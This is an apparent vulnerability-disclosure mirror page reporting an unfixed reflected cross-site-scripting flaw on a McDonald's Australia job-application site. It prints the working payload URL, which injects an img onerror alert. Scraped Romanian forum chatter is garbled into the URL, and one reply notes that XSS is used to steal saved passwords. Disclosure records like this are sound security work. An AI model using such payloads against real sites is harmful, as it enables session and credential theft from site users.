Security researcher longrifle0x, has submitted on 14/01/2012 a cross-site-scripting (XSS) vulnerability affecting apply.mcdonalds.com.au, which at the time of submission ranked 84581 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 01/08/2012. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 14/01/2012 |
Date published: 01/08/2012 |
Fixed? Mail us! | Status: UNFIXED |
Author: longrifle0x |
Domain: apply.mcdonalds.com.au |
Category: XSS |
Pagerank: 84581 |
URL: https://apply.mcdonalds.com.au/public/index.cfm?action=applicantLogin&returnTo=/%22%3E%3C/object%3E% 3C/script%3E%3C/title%3E%3Cimg%20src=1%20onerror=alert%281337%29%3E&Share|LikenSnoopy%20and%20Slice2 28%20like%20this.wWw.Scoala-De-Soferi.hi2.RoQuick%20reply%20to%20this%20message%20Reply%20%20%20Repl y%20With%20Quote%20Reply%20With%20Quote%20%20%20Multi-Quote%20This%20MessageRe:%20[Xss]%20McDonalds0 1-04-2012,%2008:47%20AM%20#2pr0totypEpr0totypE%20is%20offlineRegistered%20user%20Bautor%20de%20bere% 20Array%20pr0totypE%27s%20AvatarJoin%20DateNov%202011LocationYou%20can%27t%20find%20me;%20I%20can%20 only%20find%20you.......Certainly%20is%20that%20CHUCK%20NORRIS%20can%20find%20us%20both%20:%29%29%29 Posts37Rep%20Power0Send%20a%20message%20via%20Yahoo%20to%20pr0totypEDefaultCe%20face?%20E%20doar%20u n%20link%20spre%20o%20pagina%20cu%20angajari%20de%20la%20Mac?Share|LikeNu%20sunt%20foarte%20intelige nt,%20dar%20sunt%20pe%20cat%20se%20poate%20de%20corect.[TuToriaL%20FlooD%20IP]Quick%20reply%20to%20t his%20message%20Reply%20%20%20Reply%20With%20Quote%20Reply%20With%20Quote%20%20%20Multi-Quote%20This %20MessageRe:%20[Xss]%20McDonalds01-04-2012,%2009:53%20AM%20#3GeckoGecko%20is%20online%20nowDesigner %20Cultul%20betivilor%20Array%20Gecko%27s%20AvatarJoin%20DateMar%202011LocationLocation,%20location, %20location...Posts1,182Rep%20Power2DefaultQuote%20Originally%20Posted%20by%20pr0totypE%20View%20Pos tCe%20face?%20E%20doar%20un%20link%20spre%20o%20pagina%20cu%20angajari%20de%20la%20Mac?Printr-un%20a tac%20XSS%20poti%20injecta%20cod%20javascript%20in%20o%20pagina%20web%20direct%20in%20address%20bar. %20Majoritatea%20oamenilor%20folosesc%20acest%20atac%20pentru%20a%20fura%20parolele%20salvate%20in%2 0calculatoarelor%20victimelor.Acel%20onerror=%22alert%281337%29%22%20executa%20cod%20JavaScript.Shar e|Like%22Take%20your%20time%20and%20do%20your%20best!%22Quick%20reply%20to%20this%20message%20Reply% 20%20%20Reply%20With%20Quote%20Reply%20With%20Quote%20%20%20Multi-Quote%20This%20MessageRe:%20[Xss]% 20McDonalds01-04-2012,%2009:54%20AM%20#4pr00fpr00f%20is%20offlineRegistered%20user%20Bautor%20de%20a bsinth%20ArrayJoin%20DateDec%202010Posts765Rep%20Power3DefaultQuote%20Originally%20Posted%20by%20pr0 totypE%20View%20PostCe%20face?%20E%20doar%20un%20link%20spre%20o%20pagina%20cu%20angajari%20de%20la% 20Mac?Cross-site%20scripting%20-%20Wikipedia,%20the%20free%20encyclopediaIgnoran%C8%9Ba%20nu%20aduce %20cuno%C8%99tin%C8%9Be.%20Precum%20%C8%99i%20fonturile%20colorate.Share|LikeYour%20mother%20is%20so %20fat,%20the%20recursive%20function%20computing%20her%20mass%20causes%20a%20stack%20overflow.Quick% 20reply%20to%20this%20message%20Reply%20%20%20Reply%20With%20Quote%20Reply%20With%20Quote%20%20%20Mu lti-Quote%20This%20Message |
Click here to view the mirror
|
|
|